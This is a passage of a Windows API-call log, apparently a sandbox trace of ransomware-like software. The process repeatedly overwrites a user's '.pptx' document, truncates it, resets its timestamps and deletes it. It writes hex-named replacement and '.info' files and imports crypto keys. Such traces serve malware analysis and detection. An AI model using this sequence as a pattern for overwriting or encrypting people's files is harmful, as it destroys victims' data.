1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.322] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.322] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x370, lpOverlapped=0x0) returned 1 [0075.322] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.323] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2.info", lpFilePart=0x0) returned 0x4d [0075.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\58711d0fa3a3435660c842996474bea2.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.324] GetFileType (hFile=0x36c) returned 0x1 [0075.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.324] GetFileType (hFile=0x36c) returned 0x1 [0075.324] WriteFile (in: hFile=0x36c, lpBuffer=0x21b1ec0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x21b1ec0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.325] CloseHandle (hObject=0x36c) returned 1 [0075.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.326] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvok d.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfa83010, ftCreationTime.dwHighDateTime=0x1d4ca1f, ftLastAccessTime.dwLowDateTime=0x99ada280, ftLastAccessTime.dwHighDateTime=0x1d4c6e9, ftLastWriteTime.dwLowDateTime=0x99ada280, ftLastWriteTime.dwHighDateTime=0x1d4c6e9, nFileSizeHigh=0x0, nFileSizeLow=0xe36f)) returned 1 [0075.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.326] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", dwFileAttributes=0x80) returned 1 [0075.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.326] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvok d.pptx"), fInfoLevelId=0x0, lpFileInformation=0x21b9a98 | out: lpFileInformation=0x21b9a98*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfa83010, ftCreationTime.dwHighDateTime=0x1d4ca1f, ftLastAccessTime.dwLowDateTime=0x99ada280, ftLastAccessTime.dwHighDateTime=0x1d4c6e9, ftLastWriteTime.dwLowDateTime=0x99ada280, ftLastWriteTime.dwHighDateTime=0x1d4c6e9, nFileSizeHigh=0x0, nFileSizeLow=0xe36f)) returned 1 [0075.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvok d.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.327] GetFileType (hFile=0x36c) returned 0x1 [0075.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.327] GetFileType (hFile=0x36c) returned 0x1 [0075.327] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.328] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.328] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.329] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.330] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.331] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.331] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.349] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.350] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.351] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.351] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.352] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.353] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.354] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.354] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.354] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0075.355] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.355] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.356] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.357] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.358] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.358] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.359] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.360] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.361] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.361] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.362] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.363] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.363] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.364] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.365] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.365] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0075.365] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.366] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.367] WriteFile (in: hFile=0x36c, lpBuffer=0x21b9f00*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f00*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.368] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.368] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.369] SetEndOfFile (hFile=0x36c) returned 1 [0075.370] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.370] CloseHandle (hObject=0x36c) returned 1 [0075.370] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvok d.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.370] GetFileType (hFile=0x36c) returned 0x1 [0075.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.370] GetFileType (hFile=0x36c) returned 0x1 [0075.370] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.370] CloseHandle (hObject=0x36c) returned 1 [0075.370] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvok d.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.371] GetFileType (hFile=0x36c) returned 0x1 [0075.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.371] GetFileType (hFile=0x36c) returned 0x1 [0075.371] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.371] CloseHandle (hObject=0x36c) returned 1 [0075.371] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvok d.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.371] GetFileType (hFile=0x36c) returned 0x1 [0075.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.371] GetFileType (hFile=0x36c) returned 0x1 [0075.371] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.371] CloseHandle (hObject=0x36c) returned 1 [0075.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.372] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvok d.pptx")) returned 1 [0075.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", lpFilePart=0x0) returned 0x48 [0075.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\58711d0fa3a3435660c842996474bea2"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.373] GetFileType (hFile=0x36c) returned 0x1 [0075.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.373] GetFileType (hFile=0x36c) returned 0x1 [0075.373] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.373] CloseHandle (hObject=0x36c) returned 1 [0075.373] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", lpFilePart=0x0) returned 0x48 [0075.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\58711d0fa3a3435660c842996474bea2"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.373] GetFileType (hFile=0x36c) returned 0x1 [0075.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.373] GetFileType (hFile=0x36c) returned 0x1 [0075.373] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.373] CloseHandle (hObject=0x36c) returned 1 [0075.373] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", lpFilePart=0x0) returned 0x48 [0075.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\58711d0fa3a3435660c842996474bea2"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.374] GetFileType (hFile=0x36c) returned 0x1 [0075.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.374] GetFileType (hFile=0x36c) returned 0x1 [0075.374] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.374] CloseHandle (hObject=0x36c) returned 1 [0075.374] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.374] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.375] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x21bd280, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.375] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.375] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.375] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21bd370, pdwDataLen=0x1bf5db30 | out: pbData=0x21bd370*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.375] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x21bd490, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.375] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.375] 